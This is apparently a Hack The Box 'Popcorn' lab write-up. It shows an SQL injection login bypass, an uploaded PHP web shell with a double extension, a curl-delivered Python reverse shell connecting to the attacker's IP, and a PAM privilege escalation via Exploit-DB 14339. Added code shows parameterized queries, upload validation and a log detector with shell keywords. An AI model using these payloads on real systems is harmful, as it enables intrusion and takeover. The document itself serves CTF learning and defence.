[Meachines] [Medium] Popcorn SQLI+Upload File+PAM…

2024-08-25

Information gathering

IP Address    Open Ports
10.10.10.6    TCP: 22, 80

$ nmap -p- 10.10.10.6 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp    open     http        Apache httpd 2.2.12
|_http-title: Did not follow redirect to http://popcorn.htb/
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLi & file upload

# echo '10.10.10.6 popcorn.htb'>>/etc/hosts

$ feroxbuster --url http://popcorn.htb/


http://popcorn.htb/torrent/login.php


username:admin' or '1'='1
password:xxx
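Why the login form accepts that username is easiest to see with the two query styles side by side. This is an added example, not code from the writeup or from the torrent site; the users table and the stored password are constructed sample data, and the function names are this example's own.

```python
"""Added example (not from the original writeup): the login-bypass payload
from the page run against a concatenated query and a parameterized one.

An in-memory SQLite table stands in for the torrent site's user table;
its schema and the password value are constructed, not the real ones."""
import sqlite3

USERNAME_PAYLOAD = "admin' or '1'='1"   # payload used in the writeup
PASSWORD_PAYLOAD = "xxx"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a single 'admin' row with a placeholder password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'placeholder-password')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String concatenation. With the payload the statement becomes
       ... WHERE username = 'admin' or '1'='1' AND password = 'xxx'
    AND binds tighter than OR, so this reads
       username = 'admin' OR ('1'='1' AND password = 'xxx')
    and the left disjunct alone matches the admin row."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the whole payload is compared as one literal string,
    so the quotes never reach the SQL parser and no row matches."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", login_vulnerable(db, USERNAME_PAYLOAD, PASSWORD_PAYLOAD))
    print("parameterized:", login_parameterized(db, USERNAME_PAYLOAD, PASSWORD_PAYLOAD))
```

Note the operator-precedence detail in the comment: the bypass works here because a user literally named `admin` exists; the `or '1'='1'` clause on its own would still be ANDed with the password check.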


http://popcorn.htb/torrent/torrents.php?mode=upload

$ wget https://cdimage.kali.org/kali-2024.2/kali-linux-2024.2-installer-amd64.iso.torrent -O 1.torrent


http://popcorn.htb/torrent/torrents.php?mode=details&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc


popcorn.htb/torrent/edit.php?mode=edit&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc


POST /torrent/upload_file.php?mode=upload&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc HTTP/1.1
Host: popcorn.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------356668434211973508953699136894
Content-Length: 378901
Origin: http://popcorn.htb
Connection: close
Referer: http://popcorn.htb/torrent/edit.php?mode=edit&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc
Cookie: /torrent/login.php=; saveit_0=1; saveit_1=0; /torrent/torrents.php=; /torrent/=; /torrent/index.php=; /torrent/torrents.phpfirsttimeload=0; PHPSESSID=8d214a4d51e6d9b98fb3d5ea8cec6e45
Upgrade-Insecure-Requests: 1

-----------------------------356668434211973508953699136894
Content-Disposition: form-data; name="file"; filename="Screenshot 2024-08-16 182829.png.php"
Content-Type: image/png

<?php system($_GET[1]);phpinfo();?>
-----------------------------356668434211973508953699136894
Content-Disposition: form-data; name="submit"

Submit Screenshot
-----------------------------356668434211973508953699136894--
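The request above gets through because the screenshot handler trusts the client-supplied `Content-Type: image/png` and the `.png` in the middle of the filename, then stores the file under the torrent id while keeping the user's final extension. The following is an added example, not the torrent site's code, of the server-side checks that would have rejected it; the allowlist, magic-byte table and function names are this example's own assumptions.

```python
"""Added example (not from the original writeup): validation an image-upload
handler should apply before storing a user file. Assumptions: PNG/JPEG/GIF
are the only accepted screenshot types, and the stored name is chosen by
the server (torrent id + validated extension), never by the client."""
import os
from typing import Tuple

# Extension -> leading magic bytes. The client's Content-Type header is
# attacker-controlled, so the body itself is what gets checked.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def validate_screenshot(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason-or-extension)."""
    # 1. Only the LAST extension counts. "x.png.php" has extension ".php";
    #    a substring check for ".png" is exactly what the double extension defeats.
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext!r} not allowed"
    # 2. The body must start with the magic bytes of the type the extension claims.
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match declared image type"
    # 3. Defence in depth against image/PHP polyglots: a real PNG has no
    #    reason to carry a PHP open tag. The primary control is still that the
    #    upload directory must not execute scripts at all.
    if b"<?php" in content:
        return False, "embedded PHP tag"
    return True, ext


def stored_name(torrent_id: str, validated_ext: str) -> str:
    """Server-chosen filename: the torrent id plus the extension that passed
    validation. The client's filename is never used for the stored path."""
    return f"{torrent_id}{validated_ext}"


if __name__ == "__main__":
    # Constructed inputs mirroring the request on the page.
    print(validate_screenshot("Screenshot 2024-08-16 182829.png.php",
                              b"<?php system($_GET[1]);phpinfo();?>"))
    print(validate_screenshot("shot.png", ALLOWED_TYPES[".png"] + b"\x00" * 16))
```

Even with these checks, the decisive fix for this class of bug is configuration: the directory that receives uploads must be served with script execution disabled (no PHP handler for that path), so that a file which slips past validation is returned as bytes rather than run.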


http://popcorn.htb/torrent/upload/


http://popcorn.htb/torrent/upload/15e47da8c58f93e7bd55a60ef02d4bf05645becc.php?1=dir


$ curl 'http://popcorn.htb/torrent/upload/15e47da8c58f93e7bd55a60ef02d4bf05645becc.php?1=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.16.24%22%2C10032%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27'
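From the web server's side, both the `?1=dir` probe and the reverse-shell request above leave a clear trace: a GET for a `.php` file under `/torrent/upload/` carrying a query string. The following is an added example, not part of the writeup, of a small access-log triage that flags them; the log lines are constructed in Apache's default combined format to match the URLs shown on this page, and the regexes and keyword list are this example's own.

```python
"""Added example (not from the original writeup): flag requests that execute
a script out of the torrent site's upload directory. Log lines are
constructed samples in Apache combined format; IPs and timestamps are made up."""
import re
from typing import List, Tuple
from urllib.parse import unquote

SAMPLE_LOG = [
    # Legitimate image fetched from the upload dir: should not be flagged.
    '10.10.14.5 - - [25/Aug/2024:14:29:40 +0000] "GET /torrent/upload/15e47da8c58f93e7bd55a60ef02d4bf05645becc.png HTTP/1.1" 200 40211 "-" "Mozilla/5.0"',
    # The ?1=dir probe from the page.
    '10.10.16.24 - - [25/Aug/2024:14:30:01 +0000] "GET /torrent/upload/15e47da8c58f93e7bd55a60ef02d4bf05645becc.php?1=dir HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    # The reverse-shell request from the page (query string URL-encoded as sent).
    '10.10.16.24 - - [25/Aug/2024:14:31:12 +0000] "GET /torrent/upload/15e47da8c58f93e7bd55a60ef02d4bf05645becc.php?1=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.16.24%22%2C10032%29%29%3Bimport%20pty%3Bpty.spawn%28%22%2Fbin%2Fbash%22%29%27 HTTP/1.1" 200 312 "-" "curl/8.0"',
    # Normal application page: should not be flagged.
    '10.10.14.5 - - [25/Aug/2024:14:20:00 +0000] "GET /torrent/torrents.php?mode=upload HTTP/1.1" 200 8801 "-" "Mozilla/5.0"',
]

# Apache "combined" format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)
# Any server-side script type served from the upload directory.
UPLOAD_SCRIPT_RE = re.compile(r"^/torrent/upload/[^/]+\.(php\d?|phtml|phar)$", re.I)
# Words that rarely belong in a query string to an image host.
SHELL_HINTS = ("python", "perl", "bash", "/bin/", "socket", "pty.spawn", "nc ", "wget", "curl")


def triage_line(line: str) -> List[str]:
    """Return the list of reasons this line is suspicious (empty if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, _, query = unquote(m["path"]).partition("?")
    reasons = []
    if UPLOAD_SCRIPT_RE.match(path):
        reasons.append("script executed from upload directory")
        if any(hint in query.lower() for hint in SHELL_HINTS):
            reasons.append("shell-like command in query string")
    return reasons


def triage_log(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """(line index, client ip, reasons) for every flagged line."""
    hits = []
    for i, line in enumerate(lines):
        reasons = triage_line(line)
        if reasons:
            hits.append((i, LOG_RE.match(line)["ip"], reasons))
    return hits


if __name__ == "__main__":
    for idx, ip, why in triage_log(SAMPLE_LOG):
        print(f"line {idx} from {ip}: {', '.join(why)}")
```

The first reason on its own is the high-value signal: on a host that only ever serves images from `/torrent/upload/`, any request that resolves to a script there means a file with an executable extension was stored, whatever the query string says.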


User.txt

5cdfb68827912b249896490a60bf420c

Privilege escalation

$ uname -a


Running ls -lAR /home/george shows an unusual file, motd.legal-displayed, in the .cache directory. Some research turns up Exploit-DB 14339, which describes a file-tampering privilege escalation vulnerability in PAM 1.1.0. Through this vulnerability a script can be executed on the target to obtain root. Note that an interactive shell is required; from a non-interactive shell one can be obtained by running python -c 'import pty; pty.spawn("/bin/sh")'. The root flag can then be read from /root/root.txt.

motd.legal-displayed is a file associated with PAM (Pluggable Authentication Modules). It relates to the legal notice shown with the "Message of the Day" (MOTD, the login welcome message): in some PAM configurations it is used to record whether the user has already seen that notice, so that the appropriate prompt or handling can be applied at each login.


https://www.exploit-db.com/exploits/14339


$ chmod +x exp.sh

$ ./exp.sh


Root.txt

d87c02b4781a36f55ea99c8c8fbf4d20
